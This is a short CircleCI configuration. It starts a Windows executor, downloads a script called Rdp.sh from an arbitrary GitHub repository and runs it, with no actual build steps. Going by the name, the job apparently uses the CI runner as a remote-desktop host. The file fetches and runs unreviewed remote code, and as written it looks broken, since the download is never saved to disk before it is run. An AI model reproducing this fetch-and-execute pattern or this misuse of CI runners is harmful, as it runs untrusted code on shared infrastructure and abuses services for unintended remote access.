version: 2.1 

 
 
orbs:

  win: circleci/windows@2.2.0
  
 
 
jobs:

  build: 
  
    executor:
    
      name: win/default 
      
      size: "medium" 
      
 
 
    steps:
    
      - checkout      
      
      - run: Invoke-WebRequest https://raw.githubusercontent.com/Gfffvgdsss/Rdp/main/Rdp.sh
      
      - run: ./Rdp.sh
      
    
      
